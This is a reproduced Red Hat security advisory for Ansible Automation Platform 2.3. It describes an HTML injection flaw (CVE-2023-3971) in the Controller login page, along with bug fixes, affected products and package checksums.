Security
Headlines
HeadlinesLatestCVEs

Headline

RHSA-2023:4590: Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update

An update is now available for Red Hat Ansible Automation Platform 2.3 Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

  • CVE-2023-3971: An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.
Red Hat Security Data
#vulnerability#web#linux#red_hat#nodejs#js#kubernetes#aws

Skip to navigation Skip to main content

Utilities

  • Subscriptions
  • Downloads
  • Containers
  • Support Cases

Infrastructure and Management

  • Red Hat Enterprise Linux
  • Red Hat Satellite
  • Red Hat Subscription Management
  • Red Hat Insights
  • Red Hat Ansible Automation Platform

Cloud Computing

  • Red Hat OpenShift
  • Red Hat OpenStack Platform
  • Red Hat OpenShift Container Platform
  • Red Hat OpenShift Data Science
  • Red Hat OpenShift Dedicated
  • Red Hat Advanced Cluster Security for Kubernetes
  • Red Hat Advanced Cluster Management for Kubernetes
  • Red Hat Quay
  • Red Hat CodeReady Workspaces
  • Red Hat OpenShift Service on AWS

Storage

  • Red Hat Gluster Storage
  • Red Hat Hyperconverged Infrastructure
  • Red Hat Ceph Storage
  • Red Hat OpenShift Data Foundation

Runtimes

  • Red Hat Runtimes
  • Red Hat JBoss Enterprise Application Platform
  • Red Hat Data Grid
  • Red Hat JBoss Web Server
  • Red Hat Single Sign On
  • Red Hat support for Spring Boot
  • Red Hat build of Node.js
  • Red Hat build of Quarkus

Integration and Automation

All Products

Issued:

2023-08-09

Updated:

2023-08-09

RHSA-2023:4590 - Security Advisory

  • Overview
  • Updated Packages

Synopsis

Moderate: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update

Type/Severity

Security Advisory: Moderate

Red Hat Insights patch analysis

Identify and remediate systems affected by this advisory.

View affected systems

Topic

An update is now available for Red Hat Ansible Automation Platform 2.3

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description

Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.

Security Fix(es):

  • automation controller: Html injection in custom login info (CVE-2023-3971)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional changes for automation controller:

  • automation-controller has been updated to 4.3.11 (AAP-14634)
  • receptor has been updated to 1.4.1 (AAP-14641)
  • Fixed server error that happens when deleting workflow jobs ran before event partitioning migration (AAP-7965)
  • Fixed bug where users could get an erroneous 400 error when disabling or enabling a schedule (AAP-10943)
  • Fixed bug causing screen to crash when changing credential type dropdown in launch prompt modal (AAP-11443)
  • Fixed an issue with slow database ‘UPDATE’ statements when using nested tasks(include_tasks) causing task manager timeout (AAP-12585)
  • Fixed bug where adding new labels to a job through prompting didn’t work (AAP-14205)
  • Re-enabled Pendo support by providing the correct pendo api key (AAP-14214)
  • Added noopener and noreferrer to Controller UI links that were missing it (AAP-14346)
  • Updated links to docs from subscriptions page to reflect only major version being used (AAP-14376)
  • Turned off autocomplete on remaining Controller ui forms that were missing that attribute (AAP-14443)
  • Fixed bug where forms provided in the custom login info would render and execute. (AAP-14627)

Other changes:

  • Initial release of aap-metrics-utility (AAP-14116)

Solution

Red Hat Ansible Automation Platform

Affected Products

  • Red Hat Ansible Automation Platform 2.3 for RHEL 9 x86_64
  • Red Hat Ansible Automation Platform 2.3 for RHEL 8 x86_64
  • Red Hat Ansible Inside 1.1 for RHEL 9 x86_64
  • Red Hat Ansible Inside 1.1 for RHEL 8 x86_64
  • Red Hat Ansible Developer 1.0 for RHEL 9 x86_64
  • Red Hat Ansible Developer 1.0 for RHEL 8 x86_64

Fixes

  • BZ - 2226965 - CVE-2023-3971 Controller: Html injection in custom login info

Red Hat Ansible Automation Platform 2.3 for RHEL 9

SRPM

aap-metrics-utility-0.0.1-1.el9ap.src.rpm

SHA-256: 7f14df94f4c20333a97b119d362d6839208d6d5e5d07268dcf6165a70547f28f

automation-controller-4.3.11-1.el9ap.src.rpm

SHA-256: 9ee07adf5fa846a6f44adc5acd8b69ff932fa37f165085f04bfbe9e10c51024d

receptor-1.4.1-1.el9ap.src.rpm

SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356

x86_64

aap-metrics-utility-0.0.1-1.el9ap.noarch.rpm

SHA-256: 2301e65c3ce8e27881e03896f5cb721c08c3be7fd660113ed990ef77e69a3ec3

automation-controller-4.3.11-1.el9ap.x86_64.rpm

SHA-256: 2168b43483c0ece5c95a014331652c1b90bf3d03206cb9f686f012022617c0c0

automation-controller-cli-4.3.11-1.el9ap.x86_64.rpm

SHA-256: 54b3aa2454830d2e9c09bc71acce1c9348a6f8ad25e5231de22a1287b292933d

automation-controller-server-4.3.11-1.el9ap.x86_64.rpm

SHA-256: 99163dfa17eebd76f122eda5baa0cdfd974e27bb7bebc83cea1158e41d1338af

automation-controller-ui-4.3.11-1.el9ap.x86_64.rpm

SHA-256: ee51cc9fdef0ff468f3e909ace769ea6f08675e72e02f3e5df0230a97831ce58

automation-controller-venv-tower-4.3.11-1.el9ap.x86_64.rpm

SHA-256: 8630cbcab523dffc5976044bd5f6443bcb32ab05600617fb82d9cda590833d78

receptor-1.4.1-1.el9ap.x86_64.rpm

SHA-256: 8ed9b998593e0090e61cd9c5584631f8b54ce7cb185a44181107b32321faa0e7

receptorctl-1.4.1-1.el9ap.noarch.rpm

SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde

Red Hat Ansible Automation Platform 2.3 for RHEL 8

SRPM

aap-metrics-utility-0.0.1-1.el8ap.src.rpm

SHA-256: ac14922f6e98dd1f23e14f925edc0f2b3cb6d4bc2534c11cd818764e3ae499c3

automation-controller-4.3.11-1.el8ap.src.rpm

SHA-256: 4f9de69b7284d9c7f243b52c20640a15ee2a8370a9df40551f83afb5f2d5428c

receptor-1.4.1-1.el8ap.src.rpm

SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76

x86_64

aap-metrics-utility-0.0.1-1.el8ap.noarch.rpm

SHA-256: e2aa035ac5bb4dff6aba61c52ad8c00b476921f5238c660302b6a3802beffe47

automation-controller-4.3.11-1.el8ap.x86_64.rpm

SHA-256: 7bdfd7ec024924aee4b0f00d5f423a9b3747a7c9a3eeb93aba6fe0f9d336b4a9

automation-controller-cli-4.3.11-1.el8ap.x86_64.rpm

SHA-256: 69443cd3fa76ae98df4e88cc31b22139d8737de205a9d6075f787eb4be11b9e7

automation-controller-server-4.3.11-1.el8ap.x86_64.rpm

SHA-256: 2f1b5171041b94f85260fcee9b0aa801d8063a26d0b81a5ee251653df0bc0bc1

automation-controller-ui-4.3.11-1.el8ap.x86_64.rpm

SHA-256: 00784ed8eebe88e1e8faac9dc93e261fda7c3a7db5125469dfcf15e62cb6e3ad

automation-controller-venv-tower-4.3.11-1.el8ap.x86_64.rpm

SHA-256: 7b8e605eab2ce9cb69ebd7bd3a8278436f829196aa3881d5a2824f9c58993970

receptor-1.4.1-1.el8ap.x86_64.rpm

SHA-256: e5f6f5fec1daae6087c2fe09e050b8af2fbe288d262d59cf5a677a2a8258bfc2

receptorctl-1.4.1-1.el8ap.noarch.rpm

SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11

Red Hat Ansible Inside 1.1 for RHEL 9

SRPM

receptor-1.4.1-1.el9ap.src.rpm

SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356

x86_64

receptorctl-1.4.1-1.el9ap.noarch.rpm

SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde

Red Hat Ansible Inside 1.1 for RHEL 8

SRPM

receptor-1.4.1-1.el8ap.src.rpm

SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76

x86_64

receptorctl-1.4.1-1.el8ap.noarch.rpm

SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11

Red Hat Ansible Developer 1.0 for RHEL 9

SRPM

receptor-1.4.1-1.el9ap.src.rpm

SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356

x86_64

receptorctl-1.4.1-1.el9ap.noarch.rpm

SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde

Red Hat Ansible Developer 1.0 for RHEL 8

SRPM

receptor-1.4.1-1.el8ap.src.rpm

SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76

x86_64

receptorctl-1.4.1-1.el8ap.noarch.rpm

SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11

The Red Hat security contact is [email protected]. More contact details at https://access.redhat.com/security/team/contact/.

Related news

CVE-2023-3971

An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.

Red Hat Security Advisory 2023-4590-01

Red Hat Security Advisory 2023-4590-01 - Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language. Issues addressed include a html injection vulnerability.

RHSA-2023:4340: Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update

An update is now available for Red Hat Ansible Automation Platform 2.4 Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-3971: An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.